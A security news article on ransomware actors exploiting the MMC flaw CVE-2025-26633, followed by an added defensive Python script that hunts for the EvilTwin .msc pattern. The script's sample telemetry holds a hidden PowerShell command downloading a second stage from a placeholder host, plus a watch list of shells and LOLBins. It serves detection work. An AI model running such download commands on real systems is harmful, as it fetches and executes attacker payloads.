Russian Ransomware Gang Exploits Microsoft Zero-Day CVE-2025-26633 in Active Attacks
Security researchers at Trend Micro have linked a recently patched Microsoft zero-day vulnerability to active exploitation by a Russian ransomware group.
The flaw, tracked as CVE-2025-26633, was one of the six actively exploited zero-days Microsoft fixed in its latest Patch Tuesday release. Trend Micro attributes the exploitation to EncryptHub, a ransomware affiliate of RansomHub that the firm tracks as Water Gamayun.
According to Trend Micro, the group abuses a flaw in the Microsoft Management Console (MMC) framework to run attacker-controlled code and steal data from targeted systems. The technique hinges on how MMC resolves Microsoft Console (.msc) files through its Multilingual User Interface Path (MUIPath) lookup.
Attack Methodology
The attackers create two .msc files with the same name, one clean and one malicious, and place the malicious copy in an "en-US" subdirectory next to the clean one.
When the victim opens the clean file with mmc.exe, the MUIPath lookup resolves the name to the copy in the "en-US" subdirectory and loads the malicious file instead of the one the user selected, so commands run without the user seeing anything unusual.
The malicious console file relies on MMC's ActiveX control snap-in, whose ExecuteShellCommand method is used to download and run further payloads.
A related tactic is creating mock trusted directories whose names resemble legitimate system paths, then dropping and executing malicious files from those look-alike locations.
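The following Python script is an added hunting example; it is not code from the original article, from Trend Micro, or from Microsoft. It checks a file listing and Sysmon-style process-creation records (both constructed here) for the three indicators described above: a same-named .msc twin in an "en-US" subdirectory, a shell spawned by mmc.exe (the ExecuteShellCommand stage), and mmc.exe opening a console file from outside the Windows directory. The trailing-space look-alike directory (for example "C:\Windows \System32"), the list of shells to watch, and the "outside C:\Windows" heuristic are assumptions chosen for the example, not details stated on this page.

```python
"""Hunt for the MSC EvilTwin pattern (CVE-2025-26633) in file listings and
process-creation telemetry. Added example; every sample below is constructed."""
import re
from pathlib import PureWindowsPath

# Directories whose look-alikes serve as "mock trusted directories".
TRUSTED_DIRS = (r"C:\Windows\System32", r"C:\Windows\SysWOW64")
# Assumption: shells and LOLBins a malicious console file is likely to spawn.
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe", "mshta.exe",
          "rundll32.exe", "wscript.exe", "cscript.exe"}
# Extracts the first drive-rooted .msc argument from a command line.
MSC_ARG = re.compile(r'([A-Za-z]:\\[^"]*?\.msc)(?=["\s]|$)', re.I)

# Constructed file listing: one EvilTwin pair plus a trailing-space mock directory.
SAMPLE_FILES = [
    r"C:\Users\alice\Downloads\Update\report.msc",
    r"C:\Users\alice\Downloads\Update\en-US\report.msc",
    r"C:\Users\alice\Downloads\Update\en-US\readme.txt",
    r"C:\Windows\System32\services.msc",
    r"C:\Windows \System32\WerFault.exe",
]

# Constructed Sysmon Event ID 1 style records (Image, ParentImage, CommandLine).
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\mmc.exe", "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'"C:\Windows\System32\mmc.exe" "C:\Users\alice\Downloads\Update\report.msc"'},
    {"Image": r"C:\Windows\System32\cmd.exe", "ParentImage": r"C:\Windows\System32\mmc.exe",
     "CommandLine": r'cmd.exe /c powershell -w hidden -c "iwr http://example.invalid/stage2 -o %TEMP%\s.ps1"'},
    {"Image": r"C:\Windows\System32\mmc.exe", "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'"C:\Windows\System32\mmc.exe" "C:\Windows\System32\services.msc"'},
    {"Image": r"C:\Windows\System32\notepad.exe", "ParentImage": r"C:\Windows\System32\mmc.exe",
     "CommandLine": r"notepad.exe C:\Users\alice\notes.txt"},
]


def find_msc_twins(paths):
    """Return (clean, twin) pairs where <dir>\\name.msc and <dir>\\en-US\\name.msc both exist."""
    index = {str(PureWindowsPath(p)).lower(): p for p in paths}
    pairs = []
    for p in paths:
        wp = PureWindowsPath(p)
        if wp.suffix.lower() != ".msc" or wp.parent.name.lower() != "en-us":
            continue
        sibling = str(wp.parent.parent / wp.name).lower()
        if sibling in index:
            pairs.append((index[sibling], p))
    return pairs


def mock_trusted_dirs(paths):
    """Flag files whose leading path components equal a trusted directory only
    after stripping whitespace (assumed variant: 'C:\\Windows \\System32')."""
    hits = []
    for p in paths:
        parts = PureWindowsPath(p).parts
        for trusted in TRUSTED_DIRS:
            tparts = [x.lower() for x in PureWindowsPath(trusted).parts]
            head = list(parts[:len(tparts)])
            if len(head) < len(tparts):
                continue
            stripped = [x.strip().lower() for x in head]
            raw = [x.lower() for x in head]
            if stripped == tparts and raw != tparts:
                hits.append(p)
                break
    return hits


def suspicious_mmc_events(events):
    """Return (rule, command_line) findings for mmc.exe-related process creations."""
    findings = []
    for e in events:
        image = PureWindowsPath(e["Image"]).name.lower()
        parent = PureWindowsPath(e["ParentImage"]).name.lower()
        cmd = e.get("CommandLine", "")
        if parent == "mmc.exe" and image in SHELLS:
            # ExecuteShellCommand stage: the console spawned a shell.
            findings.append(("mmc-spawned-shell", cmd))
        elif image == "mmc.exe":
            m = MSC_ARG.search(cmd)
            # Assumed heuristic: console files normally live under C:\Windows.
            if m and not m.group(1).lower().startswith("c:\\windows\\"):
                findings.append(("mmc-non-system-msc", cmd))
    return findings


if __name__ == "__main__":
    for clean, twin in find_msc_twins(SAMPLE_FILES):
        print(f"[twin]  {clean}  <->  {twin}")
    for p in mock_trusted_dirs(SAMPLE_FILES):
        print(f"[mock]  {p}")
    for rule, cmd in suspicious_mmc_events(SAMPLE_EVENTS):
        print(f"[{rule}]  {cmd}")
```

Run the file listing part against a directory walk of user-writable locations (Downloads, Temp, AppData) and the event part against exported Sysmon or EDR process-creation logs; the twin check is the most specific of the three, while the other two are heuristics that need tuning to local baselines.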
Expanding Attack Toolkit
Trend Micro's analysis found that Water Gamayun is continuing to evolve its tooling and has deployed several malware families alongside the MMC exploit, including:
- EncryptHub stealer – designed to exfiltrate sensitive data
- DarkWisp backdoor – providing remote access to compromised systems
- SilentPrism backdoor – used for stealthy persistence
- Rhadamanthys stealer – targeting financial and credential data
This is not the first time a Microsoft Management Console (MMC) vulnerability has been exploited. In October 2024, Microsoft confirmed that attackers had used Microsoft Saved Console (MSC) files to achieve remote code execution on Windows systems.
Researchers recommend applying the Patch Tuesday update that fixes CVE-2025-26633 without delay, and pairing it with detection that watches for mmc.exe spawning shells and for .msc files opened from user-writable locations, since the technique depends on the victim running a console file the attacker delivered.